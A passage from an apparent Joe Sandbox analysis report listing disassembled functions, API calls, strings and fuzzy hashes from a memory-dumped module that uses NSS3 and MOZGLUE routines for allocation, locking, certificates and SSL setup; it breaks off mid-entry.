realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C5B7FFA,?,6C5B9767,?,8B7874C0,0000A48E), ref: 6C5CEDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C5B7FFA,?,6C5B9767,?,8B7874C0,0000A48E), ref: 6C5CEE14

Part of subcall function 6C5A0BE0: malloc.MOZGLUE(6C598D2D,?,00000000,?), ref: 6C5A0BF8
Part of subcall function 6C5A0BE0: TlsGetValue.KERNEL32(6C598D2D,?,00000000,?), ref: 6C5A0C15

memcpy.VCRUNTIME140(?,?,6C5B9767,00000000,00000000,6C5B7FFA,?,6C5B9767,?,8B7874C0,0000A48E), ref: 6C5CEE33

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: b8877e8ab3122322495d678f32c9158b51714768b04e42363b88048d7f8a7f28
Instruction ID: 46bb6b256417d201ccef8deabca77fcefff4bbef3f84bf5e73c92ecd8f33818f
Opcode Fuzzy Hash: b8877e8ab3122322495d678f32c9158b51714768b04e42363b88048d7f8a7f28
Instruction Fuzzy Hash: 4311C6B1B00706ABEB109EE5DC85B06B3A8EF0439DF204539E91986A00E371F864C7E7

Function 6C54DFA0 Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C5606A0: TlsGetValue.KERNEL32 ref: 6C5606C2
Part of subcall function 6C5606A0: EnterCriticalSection.KERNEL32(?), ref: 6C5606D6
Part of subcall function 6C5606A0: PR_Unlock.NSS3 ref: 6C5606EB

CERT_NewCertList.NSS3 ref: 6C54DFBF
CERT_AddCertToListTail.NSS3(00000000,?), ref: 6C54DFDB
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C54DFFA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C54E029

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Cert$List$CriticalEnterErrorFindIssuerSectionTailUnlockValue
String ID:
API String ID: 3183882470-0
Opcode ID: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
Instruction ID: 9c479d17d5bfdbc6068168034b111e4710d08d621edd7eedc4a134bcd1e8d17d
Opcode Fuzzy Hash: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
Instruction Fuzzy Hash: 74112F71A00215ABDB11DEA95C44BABF578ABC035DF048934E93CD7B10F7B2DC1496E1

Function 6C568DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C568DE7
EnterCriticalSection.KERNEL32 ref: 6C568DFC
PR_Unlock.NSS3 ref: 6C568E2D
PR_SetError.NSS3 ref: 6C568E49

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: 358985da55ef9159c0f7c160d28d4048a94df1914a1f4a7daf4a1933ba181895
Instruction ID: 159a9f285da2ca5ff26a5fe801cdfa1863137dc048f4ec0481efd67ac62f4687
Opcode Fuzzy Hash: 358985da55ef9159c0f7c160d28d4048a94df1914a1f4a7daf4a1933ba181895
Instruction Fuzzy Hash: 88118F71A056119BD700AF79D988169BBF4FF46314F01492ADC89D7B00EB30E854CBD2

Function 6C5EAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C5D5F17,?,?,?,?,?,?,?,?,6C5DAAD4), ref: 6C5EAC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C5D5F17,?,?,?,?,?,?,?,?,6C5DAAD4), ref: 6C5EACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C5DAAD4), ref: 6C5EACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C5DAAD4), ref: 6C5EACDB

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 58ed19218dbe4ddc4d816f20512ef1bf8b8a11bb82acb098dfa9f213c28df12e
Instruction ID: 1f4a32f0b2ad9a4415e2b3116e182c10ac7e0fb8e6f292a3b7acf238ae7e65e7
Opcode Fuzzy Hash: 58ed19218dbe4ddc4d816f20512ef1bf8b8a11bb82acb098dfa9f213c28df12e
Instruction Fuzzy Hash: 800157B1601A029BE7109F3AD908652BBE8BB14659B004829E85EC2A00E731E414CB91

Function 6C551DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

CERT_DestroyCertificate.NSS3(?), ref: 6C551DFB

Part of subcall function 6C5495B0: TlsGetValue.KERNEL32(00000000,?,6C5600D2,00000000), ref: 6C5495D2
Part of subcall function 6C5495B0: EnterCriticalSection.KERNEL32(?,?,?,6C5600D2,00000000), ref: 6C5495E7
Part of subcall function 6C5495B0: PR_Unlock.NSS3(?,?,?,?,6C5600D2,00000000), ref: 6C549605

PR_EnterMonitor.NSS3 ref: 6C551E09

Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C6090AB
Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C6090C9
Part of subcall function 6C609090: EnterCriticalSection.KERNEL32 ref: 6C6090E5
Part of subcall function 6C609090: TlsGetValue.KERNEL32 ref: 6C609116
Part of subcall function 6C609090: LeaveCriticalSection.KERNEL32 ref: 6C60913F

Part of subcall function 6C54E190: PR_EnterMonitor.NSS3(?,?,6C54E175), ref: 6C54E19C
Part of subcall function 6C54E190: PR_EnterMonitor.NSS3(6C54E175), ref: 6C54E1AA
Part of subcall function 6C54E190: PR_ExitMonitor.NSS3 ref: 6C54E208
Part of subcall function 6C54E190: PL_HashTableRemove.NSS3(?), ref: 6C54E219
Part of subcall function 6C54E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C54E231
Part of subcall function 6C54E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C54E249
Part of subcall function 6C54E190: PR_ExitMonitor.NSS3 ref: 6C54E257

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C551E37
PR_ExitMonitor.NSS3 ref: 6C551E4A

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
String ID:
API String ID: 499896158-0
Opcode ID: c86d61819f91c7d1b89bfa9216330292c79546d37f0eb20de5c8d1a227d8f512
Instruction ID: 8a57d70d34853c1edf350213b9a13354dae34a6a8f90e5e80402d44d7d86fa3c
Opcode Fuzzy Hash: c86d61819f91c7d1b89bfa9216330292c79546d37f0eb20de5c8d1a227d8f512
Instruction Fuzzy Hash: E201F271B40150D7EB009E6AEC40F4B7FA4AB42B4CF614032E9199BB91E731F824CBD5

Function 6C551D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C551D75
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C551D89
PORT_ZAlloc_Util.NSS3(00000010), ref: 6C551D9C
free.MOZGLUE(00000000), ref: 6C551DB8

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Alloc_Util$Errorfree
String ID:
API String ID: 939066016-0
Opcode ID: f8562c1bd545b7a1dc9801727e04e15636a7c2629626ba1691f0d4f2ebf1a9da
Instruction ID: 1786b0c792f0e7d64949b9cc9541221704b76c12ad670f8a22a960edc08caca1
Opcode Fuzzy Hash: f8562c1bd545b7a1dc9801727e04e15636a7c2629626ba1691f0d4f2ebf1a9da
Instruction Fuzzy Hash: 46F02DB3A0121067FF105F5A5C41B477E589FC1798F500637DD1D4BB40DB71E81486E2

Function 6C5D0840 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6C6A2F88,6C5D0660,00000020,00000000,?,?,6C5D2C3D,?,00000000,00000000,?,6C5D2A28,00000060,00000001), ref: 6C5D0860

Part of subcall function 6C4C4C70: TlsGetValue.KERNEL32(?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4C97
Part of subcall function 6C4C4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4CB0
Part of subcall function 6C4C4C70: PR_Unlock.NSS3(?,?,?,?,?,6C4C3921,6C6A14E4,6C60CC70), ref: 6C4C4CC9

TlsGetValue.KERNEL32(00000020,00000000,?,?,6C5D2C3D,?,00000000,00000000,?,6C5D2A28,00000060,00000001), ref: 6C5D0874
EnterCriticalSection.KERNEL32(00000001), ref: 6C5D0884
PR_Unlock.NSS3 ref: 6C5D08A3

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$CallOnce
String ID:
API String ID: 2502187247-0
Opcode ID: 211335a48179982280ba3bbb0ca17768b8a934c9bb939fd31799c0a421bf03e0
Instruction ID: 24829d5c74720ad39c5375fc47cf088f3710d092f71a2c789e2932b1c6e39fa9
Opcode Fuzzy Hash: 211335a48179982280ba3bbb0ca17768b8a934c9bb939fd31799c0a421bf03e0
Instruction Fuzzy Hash: 04012076A40344ABEB006F6FFC8595D7734DBD731DF050166EC0C52601EB21B89487D9

Function 6C59FD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C549003,?), ref: 6C59FD91

Part of subcall function 6C5A0BE0: malloc.MOZGLUE(6C598D2D,?,00000000,?), ref: 6C5A0BF8
Part of subcall function 6C5A0BE0: TlsGetValue.KERNEL32(6C598D2D,?,00000000,?), ref: 6C5A0C15

PORT_Alloc_Util.NSS3(A4686C5A,?), ref: 6C59FDA2
memcpy.VCRUNTIME140(00000000,12D068C3,A4686C5A,?,?), ref: 6C59FDC4
free.MOZGLUE(00000000,?,?), ref: 6C59FDD1

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Alloc_Util$Valuefreemallocmemcpy
String ID:
API String ID: 2335489644-0
Opcode ID: 5dcf9378894a6d8177a7eb7c4210df467313cc5ce9e525016223249a14bdb241
Instruction ID: ac70f7572999c0e96223e60d197593f286dfdc6475c082fcb21814cb07a5e4b3
Opcode Fuzzy Hash: 5dcf9378894a6d8177a7eb7c4210df467313cc5ce9e525016223249a14bdb241
Instruction Fuzzy Hash: 34F0C2F2601346ABFB004F95DC8092BB76CEF852A9B148275FD098AF12E721D815C7E5

Function 6C65CC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C65CC61
free.MOZGLUE ref: 6C65CC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C65CC80
free.MOZGLUE(?), ref: 6C65CC87

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: de557c7b3eecac91b8606d12620738d612b68a9700dbc4b742eb82812a515fcb
Instruction ID: 257979724fef795514ac57db83d8ea4b3e3887bf395822e39588de39d761d32e
Opcode Fuzzy Hash: de557c7b3eecac91b8606d12620738d612b68a9700dbc4b742eb82812a515fcb
Instruction Fuzzy Hash: 96E06576700609AFCB10EFA9DC84C8777BCEE4A2707150525E692C3700D232F905CBE5

Function 6C539DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3 ref: 6C539E1F

Part of subcall function 6C4F13C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C4C2352,?,00000000,?,?), ref: 6C4F1413
Part of subcall function 6C4F13C0: memcpy.VCRUNTIME140(00000000,R#Ll,00000002,?,?,?,?,6C4C2352,?,00000000,?,?), ref: 6C4F14C0

Strings

ESCAPE expression must be a single character, xrefs: 6C539F78
LIKE or GLOB pattern too complex, xrefs: 6C53A006

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: memcpysqlite3_value_textstrlen
String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
API String ID: 2453365862-264706735
Opcode ID: 372da85a9802646b94d23eb95214ab44df65de268dfb55371a16b18955118a08
Instruction ID: d4e6843d01a850225614c796b2c477a14f9e1041a7581fe49dc5a56c9e8d670d
Opcode Fuzzy Hash: 372da85a9802646b94d23eb95214ab44df65de268dfb55371a16b18955118a08
Instruction Fuzzy Hash: 6C810DB1A046754BDB01CF39CC803A9B7F2AF45318F189659D8AC8BBD1EB35D846C791

Function 6C5B5860 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFD037,00000000), ref: 6C5B59C8

Part of subcall function 6C5B7EE0: PR_SetError.NSS3(00000000,00000000,00000002,?,?), ref: 6C5B7F30

PR_SetError.NSS3(FFFFD0AE,00000000), ref: 6C5B59E9

Part of subcall function 6C5BAA40: PR_SetError.NSS3(00000000,00000000,00000008,?,?), ref: 6C5BAAA2

Strings

nel, xrefs: 6C5B5963

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Error
String ID: nel
API String ID: 2619118453-4255194777
Opcode ID: c6a49c2a9506fb1b4a557cff0def88e7973e8bc1137355f1c785c3a47c01789d
Instruction ID: 53a8ff889f01b94de37ec96dcc6f5f59bd68fdde0dd76a6b6bb53b30943bb620
Opcode Fuzzy Hash: c6a49c2a9506fb1b4a557cff0def88e7973e8bc1137355f1c785c3a47c01789d
Instruction Fuzzy Hash: B341A671504301DFD714DF14DC91F5B7BA8AB84328F854629FD59AB682E730E908CBA1

Function 6C594D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C594D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C594DE6

Strings

%d.%d, xrefs: 6C594DDE

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: 832a490acc43d15b70133e976efbac280c715ab5d71416d932cf4cde9a6847cb
Instruction ID: 2a1effbf469305df042b4c6b1dfbf82be3fffe9e81aec518137e921e02274150
Opcode Fuzzy Hash: 832a490acc43d15b70133e976efbac280c715ab5d71416d932cf4cde9a6847cb
Instruction Fuzzy Hash: 9831EAB2D043596BEB109BA19C01BFF7768EF85308F050469ED199B791EB309D05CBA6

Function 6C5B4CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3('8[l,00000000,00000000,?,?,6C5B3827,?,00000000), ref: 6C5B4D0A

Part of subcall function 6C5A0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C5A08B4

SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C5B4D22

Part of subcall function 6C59FD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C541A3E,00000048,00000054), ref: 6C59FD56

Strings

'8[l, xrefs: 6C5B4D07

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Util$Equal_ErrorFindItemsTag_memcmp
String ID: '8[l
API String ID: 1521942269-731010399
Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction ID: a43b0e99636626ccad09eb7e038c9a1cfb3572fe2b8cfcb1fb6e18c29cb5f607
Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction Fuzzy Hash: 26F06232601225ABEB604E6BAC90B473ADC9B4167DF140271ED28EF791E771CC0186E1

Function 6C5DAF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6C5DAF78

Part of subcall function 6C53ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C53ACE2
Part of subcall function 6C53ACC0: malloc.MOZGLUE(00000001), ref: 6C53ACEC
Part of subcall function 6C53ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C53AD02
Part of subcall function 6C53ACC0: TlsGetValue.KERNEL32 ref: 6C53AD3C
Part of subcall function 6C53ACC0: calloc.MOZGLUE(00000001,?), ref: 6C53AD8C
Part of subcall function 6C53ACC0: PR_Unlock.NSS3 ref: 6C53ADC0
Part of subcall function 6C53ACC0: PR_Unlock.NSS3 ref: 6C53AE8C
Part of subcall function 6C53ACC0: free.MOZGLUE(?), ref: 6C53AEAB

memcpy.VCRUNTIME140(6C6A3084,6C6A02AC,00000090), ref: 6C5DAF94

Strings

SSL, xrefs: 6C5DAF73

Memory Dump Source

Source File: 00000003.00000002.3164480195.000000006C4C1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C4C0000, based on PE: true

Associated: 00000003.00000002.3164444263.000000006C4C0000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164645427.000000006C65F000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164695316.000000006C69E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164731116.000000006C69F000.00000008.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164770005.000000006C6A0000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000003.00000002.3164807434.000000006C6A5000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c4c0000_Y71AV1VIPLT8Y663WBDXSB.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: 2932aab831402e3dcedade8915824aaf0a617dc24b5b105950d0f6983c25261c
Instruction ID: b27dc51f109c41a06fc9374ef1e5346480a74be4b5591768d28fcab16505365e
Opcode Fuzzy Hash: 2932aab831402e3dcedade8915824aaf0a617dc24b5b105950d0f6983c25261c
Instruction Fuzzy Hash: 40211BB2605B499A9B00EFDBB98371A7BF2B302649F62512CD1090BB25D731F4449FDD

Function 6C530F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

